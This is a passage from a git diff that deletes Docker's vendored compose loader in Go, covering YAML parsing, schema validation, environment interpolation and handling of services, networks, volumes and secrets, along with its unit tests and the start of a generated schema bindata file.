"") - if err != nil { - return nil, err - } - return converted.(types.Dict), nil -} - -// Load reads a ConfigDetails and returns a fully loaded configuration -func Load(configDetails types.ConfigDetails) (*types.Config, error) { - if len(configDetails.ConfigFiles) < 1 { - return nil, fmt.Errorf("No files specified") - } - if len(configDetails.ConfigFiles) > 1 { - return nil, fmt.Errorf("Multiple files are not yet supported") - } - - configDict := getConfigDict(configDetails) - - if services, ok := configDict["services"]; ok { - if servicesDict, ok := services.(types.Dict); ok { - forbidden := getProperties(servicesDict, types.ForbiddenProperties) - - if len(forbidden) > 0 { - return nil, &ForbiddenPropertiesError{Properties: forbidden} - } - } - } - - if err := schema.Validate(configDict, schema.Version(configDict)); err != nil { - return nil, err - } - - cfg := types.Config{} - if services, ok := configDict["services"]; ok { - servicesConfig, err := interpolation.Interpolate(services.(types.Dict), "service", os.LookupEnv) - if err != nil { - return nil, err - } - - servicesList, err := loadServices(servicesConfig, configDetails.WorkingDir) - if err != nil { - return nil, err - } - - cfg.Services = servicesList - } - - if networks, ok := configDict["networks"]; ok { - networksConfig, err := interpolation.Interpolate(networks.(types.Dict), "network", os.LookupEnv) - if err != nil { - return nil, err - } - - networksMapping, err := loadNetworks(networksConfig) - if err != nil { - return nil, err - } - - cfg.Networks = networksMapping - } - - if volumes, ok := configDict["volumes"]; ok { - volumesConfig, err := interpolation.Interpolate(volumes.(types.Dict), "volume", os.LookupEnv) - if err != nil { - return nil, err - } - - volumesMapping, err := loadVolumes(volumesConfig) - if err != nil { - return nil, err - } - - cfg.Volumes = volumesMapping - } - - if secrets, ok := configDict["secrets"]; ok { - secretsConfig, err := interpolation.Interpolate(secrets.(types.Dict), "secret", os.LookupEnv) - if err != nil { - return nil, err - } - - secretsMapping, err := loadSecrets(secretsConfig, configDetails.WorkingDir) - if err != nil { - return nil, err - } - - cfg.Secrets = secretsMapping - } - - return &cfg, nil -} - -// GetUnsupportedProperties returns the list of any unsupported properties that are -// used in the Compose files. -func GetUnsupportedProperties(configDetails types.ConfigDetails) []string { - unsupported := map[string]bool{} - - for _, service := range getServices(getConfigDict(configDetails)) { - serviceDict := service.(types.Dict) - for _, property := range types.UnsupportedProperties { - if _, isSet := serviceDict[property]; isSet { - unsupported[property] = true - } - } - } - - return sortedKeys(unsupported) -} - -func sortedKeys(set map[string]bool) []string { - var keys []string - for key := range set { - keys = append(keys, key) - } - sort.Strings(keys) - return keys -} - -// GetDeprecatedProperties returns the list of any deprecated properties that -// are used in the compose files. -func GetDeprecatedProperties(configDetails types.ConfigDetails) map[string]string { - return getProperties(getServices(getConfigDict(configDetails)), types.DeprecatedProperties) -} - -func getProperties(services types.Dict, propertyMap map[string]string) map[string]string { - output := map[string]string{} - - for _, service := range services { - if serviceDict, ok := service.(types.Dict); ok { - for property, description := range propertyMap { - if _, isSet := serviceDict[property]; isSet { - output[property] = description - } - } - } - } - - return output -} - -// ForbiddenPropertiesError is returned when there are properties in the Compose -// file that are forbidden. -type ForbiddenPropertiesError struct { - Properties map[string]string -} - -func (e *ForbiddenPropertiesError) Error() string { - return "Configuration contains forbidden properties" -} - -// TODO: resolve multiple files into a single config -func getConfigDict(configDetails types.ConfigDetails) types.Dict { - return configDetails.ConfigFiles[0].Config -} - -func getServices(configDict types.Dict) types.Dict { - if services, ok := configDict["services"]; ok { - if servicesDict, ok := services.(types.Dict); ok { - return servicesDict - } - } - - return types.Dict{} -} - -func transform(source map[string]interface{}, target interface{}) error { - data := mapstructure.Metadata{} - config := &mapstructure.DecoderConfig{ - DecodeHook: mapstructure.ComposeDecodeHookFunc( - transformHook, - mapstructure.StringToTimeDurationHookFunc()), - Result: target, - Metadata: &data, - } - decoder, err := mapstructure.NewDecoder(config) - if err != nil { - return err - } - err = decoder.Decode(source) - // TODO: log unused keys - return err -} - -func transformHook( - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - switch target { - case reflect.TypeOf(types.External{}): - return transformExternal(data) - case reflect.TypeOf(make(map[string]string, 0)): - return transformMapStringString(source, target, data) - case reflect.TypeOf(types.UlimitsConfig{}): - return transformUlimits(data) - case reflect.TypeOf(types.UnitBytes(0)): - return loadSize(data) - case reflect.TypeOf(types.ServiceSecretConfig{}): - return transformServiceSecret(data) - } - switch target.Kind() { - case reflect.Struct: - return transformStruct(source, target, data) - } - return data, nil -} - -// keys needs to be converted to strings for jsonschema -// TODO: don't use types.Dict -func convertToStringKeysRecursive(value interface{}, keyPrefix string) (interface{}, error) { - if mapping, ok := value.(map[interface{}]interface{}); ok { - dict := make(types.Dict) - for key, entry := range mapping { - str, ok := key.(string) - if !ok { - var location string - if keyPrefix == "" { - location = "at top level" - } else { - location = fmt.Sprintf("in %s", keyPrefix) - } - return nil, fmt.Errorf("Non-string key %s: %#v", location, key) - } - var newKeyPrefix string - if keyPrefix == "" { - newKeyPrefix = str - } else { - newKeyPrefix = fmt.Sprintf("%s.%s", keyPrefix, str) - } - convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) - if err != nil { - return nil, err - } - dict[str] = convertedEntry - } - return dict, nil - } - if list, ok := value.([]interface{}); ok { - var convertedList []interface{} - for index, entry := range list { - newKeyPrefix := fmt.Sprintf("%s[%d]", keyPrefix, index) - convertedEntry, err := convertToStringKeysRecursive(entry, newKeyPrefix) - if err != nil { - return nil, err - } - convertedList = append(convertedList, convertedEntry) - } - return convertedList, nil - } - return value, nil -} - -func loadServices(servicesDict types.Dict, workingDir string) ([]types.ServiceConfig, error) { - var services []types.ServiceConfig - - for name, serviceDef := range servicesDict { - serviceConfig, err := loadService(name, serviceDef.(types.Dict), workingDir) - if err != nil { - return nil, err - } - services = append(services, *serviceConfig) - } - - return services, nil -} - -func loadService(name string, serviceDict types.Dict, workingDir string) (*types.ServiceConfig, error) { - serviceConfig := &types.ServiceConfig{} - if err := transform(serviceDict, serviceConfig); err != nil { - return nil, err - } - serviceConfig.Name = name - - if err := resolveEnvironment(serviceConfig, serviceDict, workingDir); err != nil { - return nil, err - } - - if err := resolveVolumePaths(serviceConfig.Volumes, workingDir); err != nil { - return nil, err - } - - return serviceConfig, nil -} - -func resolveEnvironment(serviceConfig *types.ServiceConfig, serviceDict types.Dict, workingDir string) error { - environment := make(map[string]string) - - if envFileVal, ok := serviceDict["env_file"]; ok { - envFiles := loadStringOrListOfStrings(envFileVal) - - var envVars []string - - for _, file := range envFiles { - filePath := absPath(workingDir, file) - fileVars, err := opts.ParseEnvFile(filePath) - if err != nil { - return err - } - envVars = append(envVars, fileVars...) - } - - for k, v := range opts.ConvertKVStringsToMap(envVars) { - environment[k] = v - } - } - - for k, v := range serviceConfig.Environment { - environment[k] = v - } - - serviceConfig.Environment = environment - - return nil -} - -func resolveVolumePaths(volumes []string, workingDir string) error { - for i, mapping := range volumes { - parts := strings.SplitN(mapping, ":", 2) - if len(parts) == 1 { - continue - } - - if strings.HasPrefix(parts[0], ".") { - parts[0] = absPath(workingDir, parts[0]) - } - parts[0] = expandUser(parts[0]) - - volumes[i] = strings.Join(parts, ":") - } - - return nil -} - -// TODO: make this more robust -func expandUser(path string) string { - if strings.HasPrefix(path, "~") { - return strings.Replace(path, "~", os.Getenv("HOME"), 1) - } - return path -} - -func transformUlimits(data interface{}) (interface{}, error) { - switch value := data.(type) { - case int: - return types.UlimitsConfig{Single: value}, nil - case types.Dict: - ulimit := types.UlimitsConfig{} - ulimit.Soft = value["soft"].(int) - ulimit.Hard = value["hard"].(int) - return ulimit, nil - default: - return data, fmt.Errorf("invalid type %T for ulimits", value) - } -} - -func loadNetworks(source types.Dict) (map[string]types.NetworkConfig, error) { - networks := make(map[string]types.NetworkConfig) - err := transform(source, &networks) - if err != nil { - return networks, err - } - for name, network := range networks { - if network.External.External && network.External.Name == "" { - network.External.Name = name - networks[name] = network - } - } - return networks, nil -} - -func loadVolumes(source types.Dict) (map[string]types.VolumeConfig, error) { - volumes := make(map[string]types.VolumeConfig) - err := transform(source, &volumes) - if err != nil { - return volumes, err - } - for name, volume := range volumes { - if volume.External.External && volume.External.Name == "" { - volume.External.Name = name - volumes[name] = volume - } - } - return volumes, nil -} - -// TODO: remove duplicate with networks/volumes -func loadSecrets(source types.Dict, workingDir string) (map[string]types.SecretConfig, error) { - secrets := make(map[string]types.SecretConfig) - if err := transform(source, &secrets); err != nil { - return secrets, err - } - for name, secret := range secrets { - if secret.External.External && secret.External.Name == "" { - secret.External.Name = name - secrets[name] = secret - } - if secret.File != "" { - secret.File = absPath(workingDir, secret.File) - } - } - return secrets, nil -} - -func absPath(workingDir string, filepath string) string { - if path.IsAbs(filepath) { - return filepath - } - return path.Join(workingDir, filepath) -} - -func transformStruct( - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - structValue, ok := data.(map[string]interface{}) - if !ok { - // FIXME: this is necessary because of convertToStringKeysRecursive - structValue, ok = data.(types.Dict) - if !ok { - panic(fmt.Sprintf( - "transformStruct called with non-map type: %T, %s", data, data)) - } - } - - var err error - for i := 0; i < target.NumField(); i++ { - field := target.Field(i) - fieldTag := field.Tag.Get("compose") - - yamlName := toYAMLName(field.Name) - value, ok := structValue[yamlName] - if !ok { - continue - } - - structValue[yamlName], err = convertField( - fieldTag, reflect.TypeOf(value), field.Type, value) - if err != nil { - return nil, fmt.Errorf("field %s: %s", yamlName, err.Error()) - } - } - return structValue, nil -} - -func transformMapStringString( - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - switch value := data.(type) { - case map[string]interface{}: - return toMapStringString(value), nil - case types.Dict: - return toMapStringString(value), nil - case map[string]string: - return value, nil - default: - return data, fmt.Errorf("invalid type %T for map[string]string", value) - } -} - -func convertField( - fieldTag string, - source reflect.Type, - target reflect.Type, - data interface{}, -) (interface{}, error) { - switch fieldTag { - case "": - return data, nil - case "healthcheck": - return loadHealthcheck(data) - case "list_or_dict_equals": - return loadMappingOrList(data, "="), nil - case "list_or_dict_colon": - return loadMappingOrList(data, ":"), nil - case "list_or_struct_map": - return loadListOrStructMap(data, target) - case "string_or_list": - return loadStringOrListOfStrings(data), nil - case "list_of_strings_or_numbers": - return loadListOfStringsOrNumbers(data), nil - case "shell_command": - return loadShellCommand(data) - case "size": - return loadSize(data) - case "-": - return nil, nil - } - return data, nil -} - -func transformExternal(data interface{}) (interface{}, error) { - switch value := data.(type) { - case bool: - return map[string]interface{}{"external": value}, nil - case types.Dict: - return map[string]interface{}{"external": true, "name": value["name"]}, nil - case map[string]interface{}: - return map[string]interface{}{"external": true, "name": value["name"]}, nil - default: - return data, fmt.Errorf("invalid type %T for external", value) - } -} - -func transformServiceSecret(data interface{}) (interface{}, error) { - switch value := data.(type) { - case string: - return map[string]interface{}{"source": value}, nil - case types.Dict: - return data, nil - case map[string]interface{}: - return data, nil - default: - return data, fmt.Errorf("invalid type %T for external", value) - } - -} - -func toYAMLName(name string) string { - nameParts := fieldNameRegexp.FindAllString(name, -1) - for i, p := range nameParts { - nameParts[i] = strings.ToLower(p) - } - return strings.Join(nameParts, "_") -} - -func loadListOrStructMap(value interface{}, target reflect.Type) (interface{}, error) { - if list, ok := value.([]interface{}); ok { - mapValue := map[interface{}]interface{}{} - for _, name := range list { - mapValue[name] = nil - } - return mapValue, nil - } - - return value, nil -} - -func loadListOfStringsOrNumbers(value interface{}) []string { - list := value.([]interface{}) - result := make([]string, len(list)) - for i, item := range list { - result[i] = fmt.Sprint(item) - } - return result -} - -func loadStringOrListOfStrings(value interface{}) []string { - if list, ok := value.([]interface{}); ok { - result := make([]string, len(list)) - for i, item := range list { - result[i] = fmt.Sprint(item) - } - return result - } - return []string{value.(string)} -} - -func loadMappingOrList(mappingOrList interface{}, sep string) map[string]string { - if mapping, ok := mappingOrList.(types.Dict); ok { - return toMapStringString(mapping) - } - if list, ok := mappingOrList.([]interface{}); ok { - result := make(map[string]string) - for _, value := range list { - parts := strings.SplitN(value.(string), sep, 2) - if len(parts) == 1 { - result[parts[0]] = "" - } else { - result[parts[0]] = parts[1] - } - } - return result - } - panic(fmt.Errorf("expected a map or a slice, got: %#v", mappingOrList)) -} - -func loadShellCommand(value interface{}) (interface{}, error) { - if str, ok := value.(string); ok { - return shellwords.Parse(str) - } - return value, nil -} - -func loadHealthcheck(value interface{}) (interface{}, error) { - if str, ok := value.(string); ok { - return append([]string{"CMD-SHELL"}, str), nil - } - return value, nil -} - -func loadSize(value interface{}) (int64, error) { - switch value := value.(type) { - case int: - return int64(value), nil - case string: - return units.RAMInBytes(value) - } - panic(fmt.Errorf("invalid type for size %T", value)) -} - -func toMapStringString(value map[string]interface{}) map[string]string { - output := make(map[string]string) - for key, value := range value { - output[key] = toString(value) - } - return output -} - -func toString(value interface{}) string { - if value == nil { - return "" - } - return fmt.Sprint(value) -} diff --git a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go b/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go deleted file mode 100644 index f7fee89ede..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/loader/loader_test.go +++ /dev/null @@ -1,800 +0,0 @@ -package loader - -import ( - "fmt" - "io/ioutil" - "os" - "sort" - "testing" - "time" - - "github.com/docker/docker/cli/compose/types" - "github.com/stretchr/testify/assert" -) - -func buildConfigDetails(source types.Dict) types.ConfigDetails { - workingDir, err := os.Getwd() - if err != nil { - panic(err) - } - - return types.ConfigDetails{ - WorkingDir: workingDir, - ConfigFiles: []types.ConfigFile{ - {Filename: "filename.yml", Config: source}, - }, - Environment: nil, - } -} - -var sampleYAML = ` -version: "3" -services: - foo: - image: busybox - networks: - with_me: - bar: - image: busybox - environment: - - FOO=1 - networks: - - with_ipam -volumes: - hello: - driver: default - driver_opts: - beep: boop -networks: - default: - driver: bridge - driver_opts: - beep: boop - with_ipam: - ipam: - driver: default - config: - - subnet: 172.28.0.0/16 -` - -var sampleDict = types.Dict{ - "version": "3", - "services": types.Dict{ - "foo": types.Dict{ - "image": "busybox", - "networks": types.Dict{"with_me": nil}, - }, - "bar": types.Dict{ - "image": "busybox", - "environment": []interface{}{"FOO=1"}, - "networks": []interface{}{"with_ipam"}, - }, - }, - "volumes": types.Dict{ - "hello": types.Dict{ - "driver": "default", - "driver_opts": types.Dict{ - "beep": "boop", - }, - }, - }, - "networks": types.Dict{ - "default": types.Dict{ - "driver": "bridge", - "driver_opts": types.Dict{ - "beep": "boop", - }, - }, - "with_ipam": types.Dict{ - "ipam": types.Dict{ - "driver": "default", - "config": []interface{}{ - types.Dict{ - "subnet": "172.28.0.0/16", - }, - }, - }, - }, - }, -} - -var sampleConfig = types.Config{ - Services: []types.ServiceConfig{ - { - Name: "foo", - Image: "busybox", - Environment: map[string]string{}, - Networks: map[string]*types.ServiceNetworkConfig{ - "with_me": nil, - }, - }, - { - Name: "bar", - Image: "busybox", - Environment: map[string]string{"FOO": "1"}, - Networks: map[string]*types.ServiceNetworkConfig{ - "with_ipam": nil, - }, - }, - }, - Networks: map[string]types.NetworkConfig{ - "default": { - Driver: "bridge", - DriverOpts: map[string]string{ - "beep": "boop", - }, - }, - "with_ipam": { - Ipam: types.IPAMConfig{ - Driver: "default", - Config: []*types.IPAMPool{ - { - Subnet: "172.28.0.0/16", - }, - }, - }, - }, - }, - Volumes: map[string]types.VolumeConfig{ - "hello": { - Driver: "default", - DriverOpts: map[string]string{ - "beep": "boop", - }, - }, - }, -} - -func TestParseYAML(t *testing.T) { - dict, err := ParseYAML([]byte(sampleYAML)) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, sampleDict, dict) -} - -func TestLoad(t *testing.T) { - actual, err := Load(buildConfigDetails(sampleDict)) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) - assert.Equal(t, sampleConfig.Networks, actual.Networks) - assert.Equal(t, sampleConfig.Volumes, actual.Volumes) -} - -func TestLoadV31(t *testing.T) { - actual, err := loadYAML(` -version: "3.1" -services: - foo: - image: busybox - secrets: [super] -secrets: - super: - external: true -`) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, len(actual.Services), 1) - assert.Equal(t, len(actual.Secrets), 1) -} - -func TestParseAndLoad(t *testing.T) { - actual, err := loadYAML(sampleYAML) - if !assert.NoError(t, err) { - return - } - assert.Equal(t, serviceSort(sampleConfig.Services), serviceSort(actual.Services)) - assert.Equal(t, sampleConfig.Networks, actual.Networks) - assert.Equal(t, sampleConfig.Volumes, actual.Volumes) -} - -func TestInvalidTopLevelObjectType(t *testing.T) { - _, err := loadYAML("1") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Top-level object must be a mapping") - - _, err = loadYAML("\"hello\"") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Top-level object must be a mapping") - - _, err = loadYAML("[\"hello\"]") - assert.Error(t, err) - assert.Contains(t, err.Error(), "Top-level object must be a mapping") -} - -func TestNonStringKeys(t *testing.T) { - _, err := loadYAML(` -version: "3" -123: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key at top level: 123") - - _, err = loadYAML(` -version: "3" -services: - foo: - image: busybox - 123: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key in services: 123") - - _, err = loadYAML(` -version: "3" -services: - foo: - image: busybox -networks: - default: - ipam: - config: - - 123: oh dear -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key in networks.default.ipam.config[0]: 123") - - _, err = loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: - 1: FOO -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "Non-string key in services.dict-env.environment: 1") -} - -func TestSupportedVersion(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - foo: - image: busybox -`) - assert.NoError(t, err) - - _, err = loadYAML(` -version: "3.0" -services: - foo: - image: busybox -`) - assert.NoError(t, err) -} - -func TestUnsupportedVersion(t *testing.T) { - _, err := loadYAML(` -version: "2" -services: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "version") - - _, err = loadYAML(` -version: "2.0" -services: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "version") -} - -func TestInvalidVersion(t *testing.T) { - _, err := loadYAML(` -version: 3 -services: - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "version must be a string") -} - -func TestV1Unsupported(t *testing.T) { - _, err := loadYAML(` -foo: - image: busybox -`) - assert.Error(t, err) -} - -func TestNonMappingObject(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - - foo: - image: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services must be a mapping") - - _, err = loadYAML(` -version: "3" -services: - foo: busybox -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.foo must be a mapping") - - _, err = loadYAML(` -version: "3" -networks: - - default: - driver: bridge -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "networks must be a mapping") - - _, err = loadYAML(` -version: "3" -networks: - default: bridge -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "networks.default must be a mapping") - - _, err = loadYAML(` -version: "3" -volumes: - - data: - driver: local -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "volumes must be a mapping") - - _, err = loadYAML(` -version: "3" -volumes: - data: local -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "volumes.data must be a mapping") -} - -func TestNonStringImage(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - foo: - image: ["busybox", "latest"] -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.foo.image must be a string") -} - -func TestValidEnvironment(t *testing.T) { - config, err := loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: - FOO: "1" - BAR: 2 - BAZ: 2.5 - QUUX: - list-env: - image: busybox - environment: - - FOO=1 - - BAR=2 - - BAZ=2.5 - - QUUX= -`) - assert.NoError(t, err) - - expected := map[string]string{ - "FOO": "1", - "BAR": "2", - "BAZ": "2.5", - "QUUX": "", - } - - assert.Equal(t, 2, len(config.Services)) - - for _, service := range config.Services { - assert.Equal(t, expected, service.Environment) - } -} - -func TestInvalidEnvironmentValue(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: - FOO: ["1"] -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.dict-env.environment.FOO must be a string, number or null") -} - -func TestInvalidEnvironmentObject(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - dict-env: - image: busybox - environment: "FOO=1" -`) - assert.Error(t, err) - assert.Contains(t, err.Error(), "services.dict-env.environment must be a mapping") -} - -func TestEnvironmentInterpolation(t *testing.T) { - config, err := loadYAML(` -version: "3" -services: - test: - image: busybox - labels: - - home1=$HOME - - home2=${HOME} - - nonexistent=$NONEXISTENT - - default=${NONEXISTENT-default} -networks: - test: - driver: $HOME -volumes: - test: - driver: $HOME -`) - - assert.NoError(t, err) - - home := os.Getenv("HOME") - - expectedLabels := map[string]string{ - "home1": home, - "home2": home, - "nonexistent": "", - "default": "default", - } - - assert.Equal(t, expectedLabels, config.Services[0].Labels) - assert.Equal(t, home, config.Networks["test"].Driver) - assert.Equal(t, home, config.Volumes["test"].Driver) -} - -func TestUnsupportedProperties(t *testing.T) { - dict, err := ParseYAML([]byte(` -version: "3" -services: - web: - image: web - build: ./web - links: - - bar - db: - image: db - build: ./db -`)) - assert.NoError(t, err) - - configDetails := buildConfigDetails(dict) - - _, err = Load(configDetails) - assert.NoError(t, err) - - unsupported := GetUnsupportedProperties(configDetails) - assert.Equal(t, []string{"build", "links"}, unsupported) -} - -func TestDeprecatedProperties(t *testing.T) { - dict, err := ParseYAML([]byte(` -version: "3" -services: - web: - image: web - container_name: web - db: - image: db - container_name: db - expose: ["5434"] -`)) - assert.NoError(t, err) - - configDetails := buildConfigDetails(dict) - - _, err = Load(configDetails) - assert.NoError(t, err) - - deprecated := GetDeprecatedProperties(configDetails) - assert.Equal(t, 2, len(deprecated)) - assert.Contains(t, deprecated, "container_name") - assert.Contains(t, deprecated, "expose") -} - -func TestForbiddenProperties(t *testing.T) { - _, err := loadYAML(` -version: "3" -services: - foo: - image: busybox - volumes: - - /data - volume_driver: some-driver - bar: - extends: - service: foo -`) - - assert.Error(t, err) - assert.IsType(t, &ForbiddenPropertiesError{}, err) - fmt.Println(err) - forbidden := err.(*ForbiddenPropertiesError).Properties - - assert.Equal(t, 2, len(forbidden)) - assert.Contains(t, forbidden, "volume_driver") - assert.Contains(t, forbidden, "extends") -} - -func durationPtr(value time.Duration) *time.Duration { - return &value -} - -func int64Ptr(value int64) *int64 { - return &value -} - -func uint64Ptr(value uint64) *uint64 { - return &value -} - -func TestFullExample(t *testing.T) { - bytes, err := ioutil.ReadFile("full-example.yml") - assert.NoError(t, err) - - config, err := loadYAML(string(bytes)) - if !assert.NoError(t, err) { - return - } - - workingDir, err := os.Getwd() - assert.NoError(t, err) - - homeDir := os.Getenv("HOME") - stopGracePeriod := time.Duration(20 * time.Second) - - expectedServiceConfig := types.ServiceConfig{ - Name: "foo", - - CapAdd: []string{"ALL"}, - CapDrop: []string{"NET_ADMIN", "SYS_ADMIN"}, - CgroupParent: "m-executor-abcd", - Command: []string{"bundle", "exec", "thin", "-p", "3000"}, - ContainerName: "my-web-container", - DependsOn: []string{"db", "redis"}, - Deploy: types.DeployConfig{ - Mode: "replicated", - Replicas: uint64Ptr(6), - Labels: map[string]string{"FOO": "BAR"}, - UpdateConfig: &types.UpdateConfig{ - Parallelism: uint64Ptr(3), - Delay: time.Duration(10 * time.Second), - FailureAction: "continue", - Monitor: time.Duration(60 * time.Second), - MaxFailureRatio: 0.3, - }, - Resources: types.Resources{ - Limits: &types.Resource{ - NanoCPUs: "0.001", - MemoryBytes: 50 * 1024 * 1024, - }, - Reservations: &types.Resource{ - NanoCPUs: "0.0001", - MemoryBytes: 20 * 1024 * 1024, - }, - }, - RestartPolicy: &types.RestartPolicy{ - Condition: "on_failure", - Delay: durationPtr(5 * time.Second), - MaxAttempts: uint64Ptr(3), - Window: durationPtr(2 * time.Minute), - }, - Placement: types.Placement{ - Constraints: []string{"node=foo"}, - }, - }, - Devices: []string{"/dev/ttyUSB0:/dev/ttyUSB0"}, - DNS: []string{"8.8.8.8", "9.9.9.9"}, - DNSSearch: []string{"dc1.example.com", "dc2.example.com"}, - DomainName: "foo.com", - Entrypoint: []string{"/code/entrypoint.sh", "-p", "3000"}, - Environment: map[string]string{ - "RACK_ENV": "development", - "SHOW": "true", - "SESSION_SECRET": "", - "FOO": "1", - "BAR": "2", - "BAZ": "3", - }, - Expose: []string{"3000", "8000"}, - ExternalLinks: []string{ - "redis_1", - "project_db_1:mysql", - "project_db_1:postgresql", - }, - ExtraHosts: map[string]string{ - "otherhost": "50.31.209.229", - "somehost": "162.242.195.82", - }, - HealthCheck: &types.HealthCheckConfig{ - Test: []string{ - "CMD-SHELL", - "echo \"hello world\"", - }, - Interval: "10s", - Timeout: "1s", - Retries: uint64Ptr(5), - }, - Hostname: "foo", - Image: "redis", - Ipc: "host", - Labels: map[string]string{ - "com.example.description": "Accounting webapp", - "com.example.number": "42", - "com.example.empty-label": "", - }, - Links: []string{ - "db", - "db:database", - "redis", - }, - Logging: &types.LoggingConfig{ - Driver: "syslog", - Options: map[string]string{ - "syslog-address": "tcp://192.168.0.42:123", - }, - }, - MacAddress: "02:42:ac:11:65:43", - NetworkMode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b", - Networks: map[string]*types.ServiceNetworkConfig{ - "some-network": { - Aliases: []string{"alias1", "alias3"}, - Ipv4Address: "", - Ipv6Address: "", - }, - "other-network": { - Ipv4Address: "172.16.238.10", - Ipv6Address: "2001:3984:3989::10", - }, - "other-other-network": nil, - }, - Pid: "host", - Ports: []string{ - "3000", - "3000-3005", - "8000:8000", - "9090-9091:8080-8081", - "49100:22", - "127.0.0.1:8001:8001", - "127.0.0.1:5000-5010:5000-5010", - }, - Privileged: true, - ReadOnly: true, - Restart: "always", - SecurityOpt: []string{ - "label=level:s0:c100,c200", - "label=type:svirt_apache_t", - }, - StdinOpen: true, - StopSignal: "SIGUSR1", - StopGracePeriod: &stopGracePeriod, - Tmpfs: []string{"/run", "/tmp"}, - Tty: true, - Ulimits: map[string]*types.UlimitsConfig{ - "nproc": { - Single: 65535, - }, - "nofile": { - Soft: 20000, - Hard: 40000, - }, - }, - User: "someone", - Volumes: []string{ - "/var/lib/mysql", - "/opt/data:/var/lib/mysql", - fmt.Sprintf("%s:/code", workingDir), - fmt.Sprintf("%s/static:/var/www/html", workingDir), - fmt.Sprintf("%s/configs:/etc/configs/:ro", homeDir), - "datavolume:/var/lib/mysql", - }, - WorkingDir: "/code", - } - - assert.Equal(t, []types.ServiceConfig{expectedServiceConfig}, config.Services) - - expectedNetworkConfig := map[string]types.NetworkConfig{ - "some-network": {}, - - "other-network": { - Driver: "overlay", - DriverOpts: map[string]string{ - "foo": "bar", - "baz": "1", - }, - Ipam: types.IPAMConfig{ - Driver: "overlay", - Config: []*types.IPAMPool{ - {Subnet: "172.16.238.0/24"}, - {Subnet: "2001:3984:3989::/64"}, - }, - }, - }, - - "external-network": { - External: types.External{ - Name: "external-network", - External: true, - }, - }, - - "other-external-network": { - External: types.External{ - Name: "my-cool-network", - External: true, - }, - }, - } - - assert.Equal(t, expectedNetworkConfig, config.Networks) - - expectedVolumeConfig := map[string]types.VolumeConfig{ - "some-volume": {}, - "other-volume": { - Driver: "flocker", - DriverOpts: map[string]string{ - "foo": "bar", - "baz": "1", - }, - }, - "external-volume": { - External: types.External{ - Name: "external-volume", - External: true, - }, - }, - "other-external-volume": { - External: types.External{ - Name: "my-cool-volume", - External: true, - }, - }, - } - - assert.Equal(t, expectedVolumeConfig, config.Volumes) -} - -func loadYAML(yaml string) (*types.Config, error) { - dict, err := ParseYAML([]byte(yaml)) - if err != nil { - return nil, err - } - - return Load(buildConfigDetails(dict)) -} - -func serviceSort(services []types.ServiceConfig) []types.ServiceConfig { - sort.Sort(servicesByName(services)) - return services -} - -type servicesByName []types.ServiceConfig - -func (sbn servicesByName) Len() int { return len(sbn) } -func (sbn servicesByName) Swap(i, j int) { sbn[i], sbn[j] = sbn[j], sbn[i] } -func (sbn servicesByName) Less(i, j int) bool { return sbn[i].Name < sbn[j].Name } diff --git a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go deleted file mode 100644 index 9486e91ae0..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go +++ /dev/null @@ -1,260 +0,0 @@ -// Code generated by go-bindata. -// sources: -// data/config_schema_v3.0.json -// data/config_schema_v3.1.json -// DO NOT EDIT! - -package schema - -import ( - "bytes" - "compress/gzip" - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "strings" - "time" -) - -func bindataRead(data []byte, name string) ([]byte, error) { - gz, err := gzip.NewReader(bytes.NewBuffer(data)) - if err != nil { - return nil, fmt.Errorf("Read %q: %v", name, err) - } - - var buf bytes.Buffer - _, err = io.Copy(&buf, gz) - clErr := gz.Close() - - if err != nil { - return nil, fmt.Errorf("Read %q: %v", name, err) - } - if clErr != nil { - return nil, err - } - - return buf.Bytes(), nil -} - -type asset struct { - bytes []byte - info os.FileInfo -} - -type bindataFileInfo struct { - name string - size int64 - mode os.FileMode - modTime time.Time -} - -func (fi bindataFileInfo) Name() string { - return fi.name -} -func (fi bindataFileInfo) Size() int64 { - return fi.size -} -func (fi bindataFileInfo) Mode() os.FileMode { - return fi.mode -} -func (fi bindataFileInfo) ModTime() time.Time { - return fi.modTime -} -func (fi bindataFileInfo) IsDir() bool { - return false -} -func (fi bindataFileInfo) Sys() interface{} { - return nil -} - -var _dataConfig_schema_v30Json = 